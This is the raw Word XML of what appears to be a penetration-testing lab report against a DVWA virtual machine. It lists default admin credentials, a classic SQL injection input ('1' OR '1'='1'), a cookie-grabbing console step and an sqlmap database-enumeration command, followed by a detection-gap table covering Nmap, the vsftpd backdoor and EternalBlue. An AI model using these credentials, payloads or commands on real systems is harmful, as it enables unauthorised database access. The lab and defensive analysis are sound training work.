    <w:p w14:paraId="1DBBFBAD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>admin                  Password1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB2E6C6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">admin                   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>letmein</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D4C2C59" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">admin                     </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E4E13D3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00F96D25">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C7C9415" wp14:editId="0249D096">
            <wp:extent cx="5731510" cy="3232150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1707982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82373" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3232150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="645B2FAF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>STEP 2 — Set Security to Low:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194148F5" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="7898A68F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Click DVWA Security in left menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133AA7B3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Set to Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C40394C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Click Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E2E616" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00142CC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64D3ADC8" wp14:editId="27BEC0B4">
            <wp:extent cx="5731510" cy="3220720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="291388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388815" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3220720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A1ACC9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="2A6E9036" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="6E9F1E63" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="695DB3B3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>STEP 3 — Go to SQL Injection Page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC3BE0E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Click SQL Injection in left menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525F0BBB" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>URL will be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2351ED50" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>http://192.168.56.102/dvwa/vulnerabilities/sqli/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1909CA84" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="27AAE320" w14:textId="2B71922B" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>STEP 4 — Manual Test in the Input Box:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D80CCD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Type this in the User ID box:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38700DEF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>1' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD34E29" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00D84C7B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BF38B36" wp14:editId="29307DF2">
            <wp:extent cx="5731510" cy="3231515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25686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86562" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3231515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6A478B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="7E4798BA" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Method 2 — Use Firefox Menu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBB13E1" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="72F65F66" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Press F12 OR click the 3 lines menu (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>☰</w:t>
      </w:r>
      <w:r>
        <w:t>) top right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B6C2E3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Click "More Tools"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F81F7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Click "Browser Console"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2109B22E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">Type: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C055333" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Press Enter — copy the PHPSESSID value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43557FC1" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="4212D9BE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="68382490" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00FB0483">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="445C72E6" wp14:editId="29B0AE0F">
            <wp:extent cx="5731510" cy="3187065"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1388971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71547" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3187065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDFA0A6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="3A22CF34" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Method 3 — Easiest! Skip Cookie Manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6473E1FE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">Just run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the login credentials directly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB1C0E3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bashsqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u 'http://192.168.56.102/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit' –data=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3DFC">
        <w:t>'id=1&amp;Submit=Submit' --forms --crawl=2 --batch --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3DFC">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A41A8B8" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="23F27609" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="000A7C5F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A123A61" wp14:editId="28569FA3">
            <wp:extent cx="5731510" cy="3193415"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="910381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381226" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3193415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A6ECEC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00E46D6E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E37088F" wp14:editId="40500F58">
            <wp:extent cx="5731510" cy="3261995"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="732303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303683" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3261995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DBCF4F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="10ACDEAC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="001F7A9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A69820D" wp14:editId="1CAF19D2">
            <wp:extent cx="5731510" cy="3187065"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="522341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341205" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3187065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E71F36" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="07A53356" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00E939D3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="047E52C0" wp14:editId="7D3951D5">
            <wp:extent cx="5731510" cy="3528695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1650553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553777" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3528695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF201D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="446FE961" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="1458F6D9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6C66">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340296AF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>The following analysis explains why existing controls in the virtualised lab environment failed to detect or prevent each phase of the attack chain. These findings map directly to remediation recommendations provided in the Executive Brief.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625B85B9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9242"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C934DB" w14:paraId="537134D8" w14:textId="77777777" w:rsidTr="00D617DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8579" w:type="dxa"/>
          </w:tcPr>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15"/>
              <w:gridCol w:w="2087"/>
              <w:gridCol w:w="2869"/>
              <w:gridCol w:w="2489"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C934DB" w14:paraId="3AED10A0" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="00B050"/>
                  <w:tcMar>
                    <w:top w:w="80" w:type="dxa"/>
                    <w:left w:w="120" w:type="dxa"/>
                    <w:bottom w:w="80" w:type="dxa"/>
                    <w:right w:w="120" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="6C25F55A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Attack Phase</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="00B050"/>
                  <w:tcMar>
                    <w:top w:w="80" w:type="dxa"/>
                    <w:left w:w="120" w:type="dxa"/>
                    <w:bottom w:w="80" w:type="dxa"/>
                    <w:right w:w="120" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="07427429" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Control Failure</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="00B050"/>
                  <w:tcMar>
                    <w:top w:w="80" w:type="dxa"/>
                    <w:left w:w="120" w:type="dxa"/>
                    <w:bottom w:w="80" w:type="dxa"/>
                    <w:right w:w="120" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="1B6F031E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Detection Gap</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="00B050"/>
                  <w:tcMar>
                    <w:top w:w="80" w:type="dxa"/>
                    <w:left w:w="120" w:type="dxa"/>
                    <w:bottom w:w="80" w:type="dxa"/>
                    <w:right w:w="120" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="0CD74E8C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Root Cause</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="23EEFD48"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33A393B5" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Reconnaissance (Nmap)</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5664878" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>No IDS/IPS deployed</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5FF6E288" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Port scans went undetected; no alerts generated</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D5D6B6D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Absence of network monitoring - no Snort/Suricata</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="2CECB91F"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2776DFA" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>vsftpd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> Backdoor (RCE)</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AC2D9D9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Outdated software in production</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002C455C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve">No patch management; </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>vsftpd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 2.3.4 known-backdoored since 2011</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D6D80A3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Failure to apply critical software updates for 13+ years</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="0E976F38"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0869C34" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>EternalBlue</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> (MS17-010)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7232460" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Unpatched Windows OS</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3A37342B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>MS17-010 publicly disclosed March 2017; patch available same month</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2D91F6C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
